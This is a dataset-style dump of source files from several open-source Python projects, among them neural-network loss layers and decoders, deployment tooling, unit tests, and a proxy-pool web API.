max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
gluoncv/torch/nn/keypoint_loss.py
|
RafLit/gluon-cv
| 5,447 |
121146
|
"""Loss layers for keypoints that can be inserted to modules"""
import torch
import torch.nn as nn
__all__ = ['WeightedMSELoss', 'HMFocalLoss']
def _sigmoid(x):
y = torch.clamp(x.sigmoid_(), min=1e-4, max=1-1e-4)
return y
class WeightedMSELoss(nn.Module):
"""Weighted MSE loss layer"""
def __init__(self):
super().__init__()
def forward(self, pred, gt, mask):
assert pred.size() == gt.size()
loss = ((pred - gt) **2) * mask
loss = loss.mean()
return loss
class HMFocalLoss(nn.Module):
"""Heatmap Focal Loss layer"""
def __init__(self, alpha, beta):
super(HMFocalLoss, self).__init__()
self.alpha = alpha
self.beta = beta
def forward(self, pred, gt):
pos_inds = gt.eq(1).float()
neg_inds = gt.lt(1).float()
pred = _sigmoid(pred)
neg_weights = torch.pow(1 - gt, self.beta)
pos_loss = torch.log(pred) * torch.pow(1 - pred, self.alpha) * pos_inds
neg_loss = torch.log(1 - pred) * torch.pow(pred, self.alpha) * neg_weights * neg_inds
num_pos = pos_inds.float().sum()
pos_loss = pos_loss.sum()
neg_loss = neg_loss.sum()
if num_pos == 0:
return -neg_loss
else:
return -(pos_loss + neg_loss) / num_pos
|
test_tensorflow.py
|
manailin/tensorflow___examples
| 156 |
121167
|
#!/usr/bin/env python
import numpy as np
import tensorflow as tf
train_X = np.linspace(-1, 1, 100)
train_Y = 2 * train_X + np.random.randn(*train_X.shape) * 0.33 + 10
X = tf.placeholder("float")
Y = tf.placeholder("float")
w = tf.Variable(0.0, name="weight")
b = tf.Variable(0.0, name="bias")
cost_op = tf.square(Y - tf.mul(X, w) - b)
train_op = tf.train.GradientDescentOptimizer(0.01).minimize(cost_op)
with tf.Session() as sess:
sess.run(tf.initialize_all_variables())
for i in range(10):
for (x, y) in zip(train_X, train_Y):
sess.run(train_op, feed_dict={X: x, Y: y})
if 1 < sess.run(w) < 3 and 9 < sess.run(b) < 11:
print("Success")
else:
print("Fail")
|
tests/inspectdb/dependent_model/__init__.py
|
bryancolligan/django-salesforce
| 251 |
121197
|
from django.apps import AppConfig
class AutoModelConf(AppConfig):
name = 'tests.inspectdb'
label = 'auto_model'
class DependentModelConf(AppConfig):
name = 'tests.inspectdb.dependent_model'
label = 'dependent_model'
|
src/hivedscheduler/config/hivedscheduler.py
|
luxius-luminus/pai
| 1,417 |
121210
|
<reponame>luxius-luminus/pai
# Copyright (c) Microsoft Corporation
# All rights reserved.
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
# to permit persons to whom the Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING
# BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import yaml
class Hivedscheduler:
def __init__(self, cluster_conf, service_conf, default_service_conf):
self.cluster_conf = cluster_conf
self.service_conf = dict(default_service_conf, **service_conf)
def validation_pre(self):
if 'webservice-port' not in self.service_conf:
return False, 'webservice-port is missing in hivedscheduler service configuration'
if 'config' not in self.service_conf:
self.service_conf['config'] = ''
return True, None
def run(self):
self.service_conf['structured-config'] = {}
if self.service_conf['config'] != '':
self.service_conf['structured-config'] = yaml.load(self.service_conf['config'], yaml.SafeLoader)
machine_list = self.cluster_conf['machine-list']
master_ip = [host['hostip'] for host in machine_list if host.get('pai-master') == 'true'][0]
self.service_conf['webservice'] = 'http://{}:{}'.format(master_ip, self.service_conf['webservice-port'])
self.service_conf['config'] = self.service_conf['config'].replace('\n', '\n ')
return self.service_conf
def validation_post(self, conf):
return True, None
|
cloudbaseinit/tests/plugins/windows/test_sanpolicy.py
|
andia10240/cloudbase-init
| 160 |
121219
|
<filename>cloudbaseinit/tests/plugins/windows/test_sanpolicy.py<gh_stars>100-1000
# Copyright 2015 Cloudbase Solutions Srl
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import unittest
try:
import unittest.mock as mock
except ImportError:
import mock
from cloudbaseinit import constant
from cloudbaseinit.plugins.windows import sanpolicy
from cloudbaseinit.tests import testutils
from cloudbaseinit.utils.windows.storage import base as storage_base
class SANPolicyPluginTests(unittest.TestCase):
def setUp(self):
self._san_policy = sanpolicy.SANPolicyPlugin()
self._san_policy_map = {
constant.SAN_POLICY_ONLINE_STR: storage_base.SAN_POLICY_ONLINE,
constant.SAN_POLICY_OFFLINE_STR: storage_base.SAN_POLICY_OFFLINE,
constant.SAN_POLICY_OFFLINE_SHARED_STR:
storage_base.SAN_POLICY_OFFLINE_SHARED,
}
def test_get_os_requirements(self):
response = self._san_policy.get_os_requirements()
self.assertEqual(response, ('win32', (6, 1)))
@mock.patch('cloudbaseinit.utils.windows.storage.factory'
'.get_storage_manager')
def _test_set_policy(self, policy, mock_storage_factory):
mock_storage_manager = mock.MagicMock()
mock_storage_manager.get_san_policy.return_value = "fake policy"
mock_storage_factory.return_value = mock_storage_manager
with testutils.ConfPatcher('san_policy', policy):
self._san_policy.execute(None, "")
mock_storage_manager.set_san_policy.assert_called_once_with(
self._san_policy_map[policy])
@mock.patch('cloudbaseinit.utils.windows.storage.factory'
'.get_storage_manager')
def _test_set_policy_already_set(self, policy, mock_storage_factory):
mock_storage_manager = mock.MagicMock()
san_policy = self._san_policy_map[policy]
mock_storage_manager.get_san_policy.return_value = san_policy
mock_storage_factory.return_value = mock_storage_manager
with testutils.ConfPatcher('san_policy', policy):
self._san_policy.execute(None, "")
self.assertEqual(mock_storage_manager.call_count, 0)
def test_set_policy_online(self):
self._test_set_policy(constant.SAN_POLICY_ONLINE_STR)
def test_set_policy_offline(self):
self._test_set_policy(constant.SAN_POLICY_OFFLINE_STR)
def test_set_policy_offline_shared(self):
self._test_set_policy(constant.SAN_POLICY_OFFLINE_SHARED_STR)
def test_set_policy_online_already_set(self):
self._test_set_policy_already_set(constant.SAN_POLICY_ONLINE_STR)
def test_set_policy_offline_already_set(self):
self._test_set_policy_already_set(constant.SAN_POLICY_OFFLINE_STR)
def test_set_policy_offline_shared_already_set(self):
self._test_set_policy_already_set(
constant.SAN_POLICY_OFFLINE_SHARED_STR)
@mock.patch('cloudbaseinit.utils.windows.storage.factory'
'.get_storage_manager')
def test_san_policy_not_set(self, mock_storage_factory):
self._san_policy.execute(None, "")
self.assertEqual(mock_storage_factory.call_count, 0)
|
salt/_states/consul.py
|
JulienPalard/psf-salt
| 103 |
121224
|
<gh_stars>100-1000
def external_service(name, datacenter, node, address, port, token=None):
ret = {'name': name, 'changes': {}, 'result': False, 'comment': ''}
if token is None:
token = __pillar__['consul']['acl']['tokens']['default']
# Determine if the cluster is ready
if not __salt__["consul.cluster_ready"]():
ret["result"] = True
ret["comment"] = "Consul cluster is not ready."
return ret
# Determine if the node we're attempting to register exists
if __salt__["consul.node_exists"](node, address, dc=datacenter):
# Determine if the service we're attempting to register exists
if __salt__["consul.node_service_exists"](
node, name, port, dc=datacenter):
ret["result"] = True
ret["comment"] = (
"External Service {} already in the desired state.".format(
name,
)
)
return ret
if __opts__['test'] == True:
ret['comment'] = 'The state of "{0}" will be changed.'.format(name)
ret['changes'] = {
'old': None,
'new': 'External Service {}'.format(name),
}
ret["result"] = None
return ret
__salt__["consul.register_external_service"](
node, address, datacenter, name, port, token,
)
ret["result"] = True
ret["comment"] = "Registered external service: '{}'.".format(name)
ret["changes"] = {
"old": None,
"new": 'External Service {}'.format(name),
}
return ret
|
pxr/usdImaging/usdAppUtils/complexityArgs.py
|
DougRogers-DigitalFish/USD
| 3,680 |
121234
|
<reponame>DougRogers-DigitalFish/USD<filename>pxr/usdImaging/usdAppUtils/complexityArgs.py
#
# Copyright 2019 Pixar
#
# Licensed under the Apache License, Version 2.0 (the "Apache License")
# with the following modification; you may not use this file except in
# compliance with the Apache License and the following modification to it:
# Section 6. Trademarks. is deleted and replaced with:
#
# 6. Trademarks. This License does not grant permission to use the trade
# names, trademarks, service marks, or product names of the Licensor
# and its affiliates, except as required to comply with Section 4(c) of
# the License and to reproduce the content of the NOTICE file.
#
# You may obtain a copy of the Apache License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the Apache License with the above modification is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the Apache License for the specific
# language governing permissions and limitations under the Apache License.
#
class RefinementComplexities(object):
"""
An enum-like container of standard complexity settings.
"""
class _RefinementComplexity(object):
"""
Class which represents a level of mesh refinement complexity. Each
level has a string identifier, a display name, and a float complexity
value.
"""
def __init__(self, compId, name, value):
self._id = compId
self._name = name
self._value = value
def __repr__(self):
return self.id
@property
def id(self):
return self._id
@property
def name(self):
return self._name
@property
def value(self):
return self._value
LOW = _RefinementComplexity("low", "Low", 1.0)
MEDIUM = _RefinementComplexity("medium", "Medium", 1.1)
HIGH = _RefinementComplexity("high", "High", 1.2)
VERY_HIGH = _RefinementComplexity("veryhigh", "Very High", 1.3)
_ordered = (LOW, MEDIUM, HIGH, VERY_HIGH)
@classmethod
def ordered(cls):
"""
Get a tuple of all complexity levels in order.
"""
return cls._ordered
@classmethod
def fromId(cls, compId):
"""
Get a complexity from its identifier.
"""
matches = [comp for comp in cls._ordered if comp.id == compId]
if len(matches) == 0:
raise ValueError("No complexity with id '{}'".format(compId))
return matches[0]
@classmethod
def fromName(cls, name):
"""
Get a complexity from its display name.
"""
matches = [comp for comp in cls._ordered if comp.name == name]
if len(matches) == 0:
raise ValueError("No complexity with name '{}'".format(name))
return matches[0]
@classmethod
def next(cls, comp):
"""
Get the next highest level of complexity. If already at the highest
level, return it.
"""
if comp not in cls._ordered:
raise ValueError("Invalid complexity: {}".format(comp))
nextIndex = min(
len(cls._ordered) - 1,
cls._ordered.index(comp) + 1)
return cls._ordered[nextIndex]
@classmethod
def prev(cls, comp):
"""
Get the next lowest level of complexity. If already at the lowest
level, return it.
"""
if comp not in cls._ordered:
raise ValueError("Invalid complexity: {}".format(comp))
prevIndex = max(0, cls._ordered.index(comp) - 1)
return cls._ordered[prevIndex]
def AddCmdlineArgs(argsParser, defaultValue=RefinementComplexities.LOW,
altHelpText=''):
"""
Adds complexity-related command line arguments to argsParser.
The resulting 'complexity' argument will be one of the standard
RefinementComplexities.
"""
helpText = altHelpText
if not helpText:
helpText = ('level of refinement to use (default=%(default)s)')
argsParser.add_argument('--complexity', '-c', action='store',
type=RefinementComplexities.fromId,
default=defaultValue,
choices=[c for c in RefinementComplexities.ordered()],
help=helpText)
|
neuralmonkey/decoders/decoder.py
|
ufal/neuralmonkey
| 446 |
121259
|
<filename>neuralmonkey/decoders/decoder.py<gh_stars>100-1000
from typing import Any, List, Tuple, cast, NamedTuple
import tensorflow as tf
from typeguard import check_argument_types
from neuralmonkey.decoders.autoregressive import (
AutoregressiveDecoder, DecoderFeedables, DecoderHistories, LoopState)
from neuralmonkey.attention.base_attention import BaseAttention
from neuralmonkey.vocabulary import Vocabulary
from neuralmonkey.model.sequence import EmbeddedSequence
from neuralmonkey.model.stateful import Stateful
from neuralmonkey.model.parameterized import InitializerSpecs
from neuralmonkey.model.model_part import ModelPart
from neuralmonkey.logging import log
from neuralmonkey.nn.ortho_gru_cell import OrthoGRUCell, NematusGRUCell
from neuralmonkey.nn.utils import dropout
from neuralmonkey.tf_utils import append_tensor
from neuralmonkey.decoders.encoder_projection import (
linear_encoder_projection, concat_encoder_projection, empty_initial_state,
EncoderProjection)
from neuralmonkey.decoders.output_projection import (
OutputProjectionSpec, OutputProjection, nonlinear_output)
from neuralmonkey.decorators import tensor
RNN_CELL_TYPES = {
"NematusGRU": NematusGRUCell,
"GRU": OrthoGRUCell,
"LSTM": tf.contrib.rnn.LSTMCell
}
class RNNFeedables(NamedTuple(
"RNNFeedables", [
("prev_rnn_state", tf.Tensor),
("prev_rnn_output", tf.Tensor),
("prev_contexts", List[tf.Tensor])])):
"""Additional feedables used only by the RNN-based decoder.
Attributes:
prev_rnn_state: The recurrent state from the previous step. A tensor
of shape ``(batch, rnn_size)``
prev_rnn_output: The output of the recurrent network from the previous
step. A tensor of shape ``(batch, output_size)``
prev_contexts: A list of context vectors returned from attention
mechanisms. Tensors of shape ``(batch, encoder_state_size)`` for
each attended encoder.
"""
class RNNHistories(NamedTuple(
"RNNHistories", [
("rnn_outputs", tf.Tensor),
("attention_histories", List[Tuple])])):
"""The loop state histories specific for RNN-based decoders.
Attributes:
rnn_outputs: History of outputs produced by RNN cell itself (before
applying output projections).
attention_histories: A list of ``AttentionLoopState`` objects (or
similar) populated by values from the attention mechanisms used in
the decoder.
"""
# pylint: disable=too-many-instance-attributes
class Decoder(AutoregressiveDecoder):
"""A class managing parts of the computation graph used during decoding."""
# pylint: disable=too-many-locals
# pylint: disable=too-many-arguments,too-many-branches,too-many-statements
def __init__(self,
encoders: List[Stateful],
vocabulary: Vocabulary,
data_id: str,
name: str,
max_output_len: int,
dropout_keep_prob: float = 1.0,
embedding_size: int = None,
embeddings_source: EmbeddedSequence = None,
tie_embeddings: bool = False,
label_smoothing: float = None,
rnn_size: int = None,
output_projection: OutputProjectionSpec = None,
encoder_projection: EncoderProjection = None,
attentions: List[BaseAttention] = None,
attention_on_input: bool = False,
rnn_cell: str = "GRU",
conditional_gru: bool = False,
supress_unk: bool = False,
reuse: ModelPart = None,
save_checkpoint: str = None,
load_checkpoint: str = None,
initializers: InitializerSpecs = None) -> None:
"""Create a refactored version of monster decoder.
Arguments:
encoders: Input encoders of the decoder.
vocabulary: Target vocabulary.
data_id: Target data series.
name: Name of the decoder. Should be unique accross all Neural
Monkey objects.
max_output_len: Maximum length of an output sequence.
dropout_keep_prob: Probability of keeping a value during dropout.
embedding_size: Size of embedding vectors for target words.
embeddings_source: Embedded sequence to take embeddings from.
tie_embeddings: Use decoder.embedding_matrix also in place
of the output decoding matrix.
rnn_size: Size of the decoder hidden state, if None set
according to encoders.
output_projection: How to generate distribution over vocabulary
from decoder_outputs.
encoder_projection: How to construct initial state from encoders.
attention: The attention object to use. Optional.
rnn_cell: RNN Cell used by the decoder (GRU or LSTM).
conditional_gru: Flag whether to use the Conditional GRU
architecture.
attention_on_input: Flag whether attention from previous decoding
step should be combined with the input in the next step.
supress_unk: If true, decoder will not produce symbols for unknown
tokens.
reuse: Reuse the model variables from the given model part.
"""
check_argument_types()
AutoregressiveDecoder.__init__(
self,
name=name,
vocabulary=vocabulary,
data_id=data_id,
max_output_len=max_output_len,
dropout_keep_prob=dropout_keep_prob,
embedding_size=embedding_size,
embeddings_source=embeddings_source,
tie_embeddings=tie_embeddings,
label_smoothing=label_smoothing,
supress_unk=supress_unk,
reuse=reuse,
save_checkpoint=save_checkpoint,
load_checkpoint=load_checkpoint,
initializers=initializers)
self.encoders = encoders
self._output_projection_spec = output_projection
self._conditional_gru = conditional_gru
self._attention_on_input = attention_on_input
self._rnn_cell_str = rnn_cell
self._rnn_size = rnn_size
self._encoder_projection = encoder_projection
self.attentions = [] # type: List[BaseAttention]
if attentions is not None:
self.attentions = attentions
if not rnn_size and not encoder_projection and not encoders:
raise ValueError(
"No RNN size, no encoders and no encoder_projection specified")
if self._rnn_cell_str not in RNN_CELL_TYPES:
raise ValueError("RNN cell must be a either 'GRU', 'LSTM', or "
"'NematusGRU'. Not {}".format(self._rnn_cell_str))
if self._attention_on_input:
self.input_projection = self.input_plus_attention
else:
self.input_projection = (
lambda *args: LoopState(*args).feedables.embedded_input)
with self.use_scope():
with tf.variable_scope("attention_decoder") as self.step_scope:
pass
self._variable_scope.set_initializer(
tf.random_normal_initializer(stddev=0.001))
# pylint: enable=too-many-arguments,too-many-branches,too-many-statements
@property
def encoder_projection(self) -> EncoderProjection:
if self._encoder_projection is not None:
return self._encoder_projection
if not self.encoders:
log("No direct encoder input. Using empty initial state")
return empty_initial_state
if self._rnn_size is None:
log("No rnn_size or encoder_projection: Using concatenation of "
"encoded states")
return concat_encoder_projection
log("Using linear projection of encoders as the initial state")
return linear_encoder_projection(self.dropout_keep_prob)
@property
def rnn_size(self) -> int:
if self._rnn_size is not None:
return self._rnn_size
if self._encoder_projection is None:
assert self.encoders
return sum(e.output.get_shape()[1].value for e in self.encoders)
raise ValueError("Cannot infer RNN size.")
@tensor
def output_projection_spec(self) -> Tuple[OutputProjection, int]:
if self._output_projection_spec is None:
log("No output projection specified - using tanh projection")
return (nonlinear_output(self.rnn_size, tf.tanh)[0], self.rnn_size)
if isinstance(self._output_projection_spec, tuple):
return self._output_projection_spec
return cast(OutputProjection,
self._output_projection_spec), self.rnn_size
# pylint: disable=unsubscriptable-object
@property
def output_projection(self) -> OutputProjection:
return self.output_projection_spec[0]
@property
def output_dimension(self) -> int:
return self.output_projection_spec[1]
# pylint: enable=unsubscriptable-object
@tensor
def initial_state(self) -> tf.Tensor:
"""Compute initial decoder state.
The part of the computation graph that computes
the initial state of the decoder.
"""
with tf.variable_scope("initial_state"):
# pylint: disable=not-callable
initial_state = dropout(
self.encoder_projection(self.train_mode,
self.rnn_size,
self.encoders),
self.dropout_keep_prob,
self.train_mode)
# pylint: enable=not-callable
init_state_shape = initial_state.get_shape()
# Broadcast the initial state to the whole batch if needed
if len(init_state_shape) == 1:
assert init_state_shape[0].value == self.rnn_size
tiles = tf.tile(initial_state,
tf.expand_dims(self.batch_size, 0))
initial_state = tf.reshape(tiles, [-1, self.rnn_size])
return initial_state
def _get_rnn_cell(self) -> tf.contrib.rnn.RNNCell:
return RNN_CELL_TYPES[self._rnn_cell_str](self.rnn_size)
def _get_conditional_gru_cell(self) -> tf.contrib.rnn.GRUCell:
if self._rnn_cell_str == "NematusGRU":
return NematusGRUCell(
self.rnn_size, use_state_bias=True, use_input_bias=False)
return RNN_CELL_TYPES[self._rnn_cell_str](self.rnn_size)
def input_plus_attention(self, *args) -> tf.Tensor:
"""Merge input and previous attentions.
Input and previous attentions are merged into a single vector
of the size fo embedding.
"""
loop_state = LoopState(*args)
feedables = loop_state.feedables
emb_with_ctx = tf.concat(
[feedables.embedded_input] + feedables.prev_contexts, 1)
return dropout(
tf.layers.dense(emb_with_ctx, self.embedding_size),
self.dropout_keep_prob, self.train_mode)
def next_state(self, loop_state: LoopState) -> Tuple[tf.Tensor, Any, Any]:
rnn_feedables = loop_state.feedables.other
rnn_histories = loop_state.histories.other
with tf.variable_scope(self.step_scope):
rnn_input = self.input_projection(*loop_state)
cell = self._get_rnn_cell()
if self._rnn_cell_str in ["GRU", "NematusGRU"]:
cell_output, next_state = cell(
rnn_input, rnn_feedables.prev_rnn_output)
attns = [
a.attention(
cell_output, rnn_feedables.prev_rnn_output,
rnn_input, att_loop_state)
for a, att_loop_state in zip(
self.attentions,
rnn_histories.attention_histories)]
if self.attentions:
contexts, att_loop_states = zip(*attns)
else:
contexts, att_loop_states = [], []
if self._conditional_gru:
cell_cond = self._get_conditional_gru_cell()
cond_input = tf.concat(contexts, -1)
cell_output, next_state = cell_cond(
cond_input, next_state, scope="cond_gru_2_cell")
elif self._rnn_cell_str == "LSTM":
prev_state = tf.contrib.rnn.LSTMStateTuple(
rnn_feedables.prev_rnn_state,
rnn_feedables.prev_rnn_output)
cell_output, state = cell(rnn_input, prev_state)
next_state = state.c
attns = [
a.attention(
cell_output, rnn_feedables.prev_rnn_output,
rnn_input, att_loop_state)
for a, att_loop_state in zip(
self.attentions,
rnn_histories.attention_histories)]
if self.attentions:
contexts, att_loop_states = zip(*attns)
else:
contexts, att_loop_states = [], []
else:
raise ValueError("Unknown RNN cell.")
# TODO: attention functions should apply dropout on output
# themselves before returning the tensors
contexts = [dropout(ctx, self.dropout_keep_prob, self.train_mode)
for ctx in list(contexts)]
cell_output = dropout(
cell_output, self.dropout_keep_prob, self.train_mode)
with tf.name_scope("rnn_output_projection"):
if self.embedding_size != self.output_dimension:
raise ValueError(
"The dimension ({}) of the output projection must be "
"same as the dimension of the input embedding "
"({})".format(self.output_dimension,
self.embedding_size))
# pylint: disable=not-callable
output = self.output_projection(
cell_output, loop_state.feedables.embedded_input,
list(contexts), self.train_mode)
# pylint: enable=not-callable
new_feedables = RNNFeedables(
prev_rnn_state=next_state,
prev_rnn_output=cell_output,
prev_contexts=list(contexts))
new_histories = RNNHistories(
rnn_outputs=append_tensor(rnn_histories.rnn_outputs, cell_output),
attention_histories=list(att_loop_states))
return (output, new_feedables, new_histories)
def get_initial_feedables(self) -> DecoderFeedables:
feedables = AutoregressiveDecoder.get_initial_feedables(self)
rnn_feedables = RNNFeedables(
prev_contexts=[tf.zeros([self.batch_size, a.context_vector_size])
for a in self.attentions],
prev_rnn_state=self.initial_state,
prev_rnn_output=self.initial_state)
return feedables._replace(other=rnn_feedables)
def get_initial_histories(self) -> DecoderHistories:
histories = AutoregressiveDecoder.get_initial_histories(self)
rnn_histories = RNNHistories(
rnn_outputs=tf.zeros(
shape=[0, self.batch_size, self.rnn_size],
dtype=tf.float32,
name="hist_rnn_output_states"),
attention_histories=[a.initial_loop_state()
for a in self.attentions if a is not None])
return histories._replace(other=rnn_histories)
def finalize_loop(self, final_loop_state: LoopState,
train_mode: bool) -> None:
for att_state, attn_obj in zip(
final_loop_state.histories.other.attention_histories,
self.attentions):
att_history_key = "{}_{}".format(
self.name, "train" if train_mode else "run")
attn_obj.finalize_loop(att_history_key, att_state)
if not train_mode:
attn_obj.visualize_attention(att_history_key)
|
src/api/proxy/proxy.py
|
a49v033/fp-server
| 173 |
121265
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
API for proxy
"""
from core import exceptions
from core.web import WebHandler
from service.proxy.proxy import proxy_srv
from service.proxy.serializers import ProxySerializer
from utils import log as logger
from utils.routes import route
from utils.tools import subdict
def return_developing():
raise exceptions.NotFound(msg=exceptions.ERR_MSG_IS_DEVELOPING)
@route(r'/api/proxy/$')
class GetProxyHandler(WebHandler):
"""
proxy api
"""
async def get(self, *args, **kwargs):
"""
get proxies
"""
count = int(self.get_param('count', 1))
scheme = self.get_param('scheme')
if scheme:
scheme = scheme.lower()
anonymity = self.get_param('anonymity')
spec = dict(count=count, scheme=scheme, anonymity=anonymity)
_items = await proxy_srv.query(spec)
items = []
for i in _items:
s = ProxySerializer(i)
items.append(s.to_representation())
data = {
"count": len(items),
"detail": items,
}
# sort_by_speed = self.get_param('sort_by_speed', 0)
self.do_success(data)
async def post(self, *args, **kwargs):
""" create new proxies
"""
item = self.get_body()
indispensibles = ('scheme', 'ip', 'port')
print(type(item), item)
for k in indispensibles:
if k not in item:
raise exceptions.ValidationError('%s cannot be empty.' % k)
_f = subdict(item, ['ip', 'port', 'scheme'])
existed = await proxy_srv.keys_by_dict(_f)
if existed:
self.do_success({'success': 0, 'key': existed},
msg='key already existed')
return
try:
_key = await proxy_srv.new_proxy(item)
self.do_success({'success': 1, 'key': _key},
msg='created successfully')
return
except Exception as e:
logger.exception('Failed: %s Detail: %s' % (item, e))
self.do_failed(code=400, msg=str(e))
async def delete(self, *args, **kwargs):
""" delete proxies
"""
self.do_success({'ok': 1}, 'todo')
@route(r'/api/proxy/report/$')
class ReportProxyHandler(WebHandler):
async def post(self, *args, **kwargs):
self.do_success({'ok': 1}, 'developing..')
|
tools/merge.py
|
mrjrty/rpaframework
| 518 |
121276
|
#!/usr/bin/env python3
import argparse
import json
import os
from pathlib import Path
FILENAME = "latest.json"
def main():
parser = argparse.ArgumentParser()
parser.add_argument("source", help="Path to directory of JSONs")
parser.add_argument("destination", help="Path to destination JSON")
args = parser.parse_args()
dirname = Path(args.source)
output = {}
for filename in sorted(os.listdir(dirname)):
if filename == FILENAME:
continue
with open(dirname / filename, "r") as infile:
lib = json.load(infile)
assert lib["name"] not in output, "Duplicate library"
output[lib["name"]] = lib
with open(args.destination, "w") as outfile:
json.dump(output, outfile, indent=4)
if __name__ == "__main__":
main()
|
nodes/0.9.x/python/String.ReplaceRegularExpression.py
|
jdehotin/Clockworkfordynamo
| 147 |
121288
|
<gh_stars>100-1000
import clr
import re
regexstring = IN[0]
regexlist = IN[1]
replacement = IN[2]
elementlist = list()
thisexp = re.compile(regexstring)
for item in regexlist:
try:
elementlist.append(thisexp.sub(replacement,item))
except:
elementlist.append(list())
OUT = elementlist
|
mt_infer.py
|
rcmckee/BPT
| 123 |
121297
|
from torchtext import data
from torch.utils.data import DataLoader
from graph import MTInferBatcher, get_mt_dataset, MTDataset, DocumentMTDataset
from modules import make_translate_infer_model
from utils import tensor_to_sequence, average_model
import torch as th
import argparse
import yaml
max_length = 1024
def run(dev_id, config):
_dataset = config['dataset']
if _dataset == 'iwslt':
TEXT = [data.Field(batch_first=True) for _ in range(2)]
dataset = get_mt_dataset('iwslt')
_, _, test = dataset.splits(exts=('.tc.zh', '.tc.en'), fields=TEXT, root='./data')
test = DocumentMTDataset(test, context_length=config['context_len'])
vocab_zh, vocab_en = dataset.load_vocab(root='./data')
print('vocab size: ', len(vocab_zh), len(vocab_en))
vocab_sizes = [len(vocab_zh), len(vocab_en)]
TEXT[0].vocab = vocab_zh
TEXT[1].vocab = vocab_en
batcher = MTInferBatcher(TEXT, config['doc_max_len'], test.BOS_TOKEN,
graph_type=config['graph_type'], **config.get('graph_attrs', {}))
test_loader = DataLoader(dataset=test,
batch_size=config['test_batch_size'],
collate_fn=batcher,
shuffle=False)
elif _dataset == 'wmt':
TEXT = data.Field(batch_first=True)
dataset = get_mt_dataset('wmt14')
_, _, test = dataset.splits(exts=['.en', '.de'], fields=[TEXT, TEXT], root='./data')
test = MTDataset(test)
vocab = dataset.load_vocab(root='./data')[0]
print('vocab size: ', len(vocab))
vocab_sizes = [len(vocab)]
TEXT.vocab = vocab
batcher = MTInferBatcher(TEXT, config['doc_max_len'], test.BOS_TOKEN,
graph_type=config['graph_type'], **config.get('graph_attrs', {}))
test_loader = DataLoader(dataset=test,
batch_size=config['test_batch_size'],
collate_fn=batcher,
shuffle=False)
elif _dataset == 'multi':
TEXT = [data.Field(batch_first=True) for _ in range(2)]
dataset = get_mt_dataset('multi30k')
_, _, test = dataset.splits(exts=['.en.atok', '.de.atok'], fields=TEXT, root='./data')
test = MTDataset(test)
vocab_en, vocab_de = dataset.load_vocab(root='./data')
print('vocab size: ', len(vocab_en), len(vocab_de))
vocab_sizes = [len(vocab_en), len(vocab_de)]
TEXT[0].vocab = vocab_en
TEXT[1].vocab = vocab_de
batcher = MTInferBatcher(TEXT, config['doc_max_len'], test.BOS_TOKEN,
graph_type=config['graph_type'], **config.get('graph_attrs', {}))
test_loader = DataLoader(dataset=test,
batch_size=config['test_batch_size'],
collate_fn=batcher,
shuffle=False)
dim_model = config['dim_model']
dim_ff = config['dim_ff']
num_heads = config['num_heads']
n_layers = config['n_layers']
m_layers = config['m_layers']
dropouti = config['dropouti']
dropouth = config['dropouth']
dropouta = config['dropouta']
dropoutc = config['dropoutc']
rel_pos = config['rel_pos']
model = make_translate_infer_model(vocab_sizes, dim_model, dim_ff, num_heads,
n_layers, m_layers,
dropouti=dropouti, dropouth=dropouth,
dropouta=dropouta, dropoutc=dropoutc,
rel_pos=rel_pos)
device = th.device(dev_id)
model.load_state_dict(
average_model(['{}-{}.pkl'.format(epoch, config['save_name']) for epoch in range(config['n_epochs'] - 5, config['n_epochs'])]))
model = model.to(device)
model.eval()
if _dataset == 'iwslt':
vocab_trg = vocab_en
elif _dataset == 'wmt':
vocab_trg = vocab
elif _dataset == 'multi':
vocab_trg = vocab_de
for batch in test_loader:
with th.no_grad():
batch.g_enc.edata['etype'] = batch.g_enc.edata['etype'].to(device)
batch.g_enc.ndata['pos'] = batch.g_enc.ndata['pos'].to(device)
batch.g_enc.ndata['x'] = batch.g_enc.ndata['x'].to(device)
for j in range(batcher.k):
batch.g_dec[j].edata['etype'] = batch.g_dec[j].edata['etype'].to(device)
batch.g_dec[j].ndata['pos'] = batch.g_dec[j].ndata['pos'].to(device)
batch.g_dec[j].ndata['x'] = batch.g_dec[j].ndata['x'].to(device)
output = model(batch, vocab_trg.stoi[MTDataset.EOS_TOKEN], sent_max_len=config['sent_max_len'])
for sequence in tensor_to_sequence(vocab_trg.itos, output, batch.n_sent_ctx):
print(sequence)
if __name__ == '__main__':
argparser = argparse.ArgumentParser("machine translation inference")
argparser.add_argument('--config', type=str)
argparser.add_argument('--gpu', type=int, default=0)
args = argparser.parse_args()
with open(args.config, 'r') as f:
config = yaml.load(f)
run(args.gpu, config)
|
Chapter09/dataservice/tests/test_views.py
|
surinkim/Python-Microservices-Development
| 208 |
121338
|
import os
import unittest
import jwt
from dataservice.app import app
from flask_webtest import TestApp as _TestApp
_HERE = os.path.dirname(__file__)
